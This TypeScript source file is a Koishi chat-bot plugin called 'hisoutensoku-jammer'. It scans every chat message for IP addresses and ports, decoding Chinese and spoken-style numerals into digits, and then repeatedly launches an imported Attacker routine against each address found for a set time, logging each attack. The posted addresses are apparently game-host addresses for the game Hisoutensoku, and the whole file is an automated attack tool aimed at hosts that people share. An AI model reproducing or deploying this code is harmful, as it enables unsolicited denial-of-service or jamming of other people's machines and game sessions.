import { Context } from "koishi-core";
import _ from "lodash";

import "source-map-support/register";
import { Logger } from "koishi-utils";
import { Attacker } from "./attacker";
import moment from "moment";

export interface HisoutensokuJammerConfig {
  target: (ctx: Context) => Context;
  attackTimeout: number;
  addressWhitelist: string[];
}

const defaultConfig: HisoutensokuJammerConfig = {
  target: (ctx: Context) => ctx.all(),
  attackTimeout: 10000,
  addressWhitelist: [],
};

const chineseCharacterList = [
  { character: '零', value: 0 },
  { character: '〇', value: 0 },
  { character: '洞', value: 0 },
  { character: '一', value: 1 },
  { character: '壹', value: 1 },
  { character: '二', value: 2 },
  { character: '贰', value: 2 },
  { character: '两', value: 2 },
  { character: '三', value: 3 },
  { character: '叁', value: 3 },
  { character: '四', value: 4 },
  { character: '肆', value: 4 },
  { character: '五', value: 5 },
  { character: '伍', value: 5 },
  { character: '六', value: 6 },
  { character: '陆', value: 6 },
  { character: '七', value: 7 },
  { character: '柒', value: 7 },
  { character: '拐', value: 7 },
  { character: '八', value: 8 },
  { character: '捌', value: 8 },
  { character: '怕', value: 8 },
  { character: '九', value: 9 },
  { character: '玖', value: 9 },
  { character: '勾', value: 9 },
  { character: '十', value: '' },
  { character: '拾', value: '' },
  { character: '百', value: '' },
  { character: '佰', value: '' },
  { character: '千', value: '' },
  { character: '仟', value: '' },
  { character: '万', value: '' },
].map(list => ({ characterRegExp: new RegExp(list.character, 'g'), value: list.value.toString() }));

class HisoutensokuJammer {
  log: Logger;
  targetCtx: Context;
  constructor(private ctx: Context, private config: HisoutensokuJammerConfig) {
    this.targetCtx = config.target(ctx);
    this.log = ctx.logger("hisoutensoku-jammer");
  }

  apply() {
    this.targetCtx.middleware(async (session, next) => {
      const message = session.content;
      this.handleMessage(message).then();
      return next();
    });
  }

  async handleMessage(message: string) {
    let realMessage = message.trim();
    for (let chineseCharacter of chineseCharacterList) {
      realMessage = realMessage.replace(chineseCharacter.characterRegExp, chineseCharacter.value)
    }
    const messageMatch: RegExpMatchArray = realMessage.match(
      /([1-2]? ?\d? ?\d ?)(([^\d][1-2]?\d{1,2}){3})[^\d]+?([1-6] ?\d ?\d ?\d ?\d)/g
    );
    if (!messageMatch) {
      return;
    }
    const attackPromises = messageMatch.map((pattern) => {
      const patternMatch = pattern.match(
        /([1-2]? ?\d? ?\d ?)(([^\d][1-2]?\d{1,2}){3})[^\d]+?([1-6] ?\d ?\d ?\d ?\d)/
      );
      const firstDigit = patternMatch[1].replace(/ /g, '');
      const address = `${firstDigit}.${patternMatch[2].slice(1).split(/[^\d]/).join(".")}`;
      const port = parseInt(patternMatch[4].replace(/ /g, ''));
      return this.startAttack(address, port);
    });
    const results: boolean[] = await Promise.all(attackPromises);
  }

  async startAttack(address: string, port: number): Promise<boolean> {
    if (this.config.addressWhitelist.includes(address)) {
      this.log.info(`Attack of ${address}:${port} skipped.`);
      return false;
    }
    this.log.info(`Attack of ${address}:${port} started.`);
    const currentTime = moment();
    while (moment().diff(currentTime) <= this.config.attackTimeout) {
      const attacker = new Attacker(address, port, 1000);
      let err;
      try {
        err = await attacker.attack();
      } catch (e) {
        err = `Error: ${e.toString()}`;
      }
      if (err) {
        this.log.warn(`Attack of ${address}:${port} failed: ${err}`);
      } else {
        this.log.info(`Attack of ${address}:${port} succeeded.`);
      }
    }
    this.log.info(`Attack of ${address}:${port} finished.`);
    return true;
  }
}

export const name = "hisoutensoku-jammer";
export function apply(
  ctx: Context,
  config: HisoutensokuJammerConfig = defaultConfig
) {
  const hisoutensokuJammer = new HisoutensokuJammer(ctx, {
    ...defaultConfig,
    ...config,
  });
  hisoutensokuJammer.apply();
}
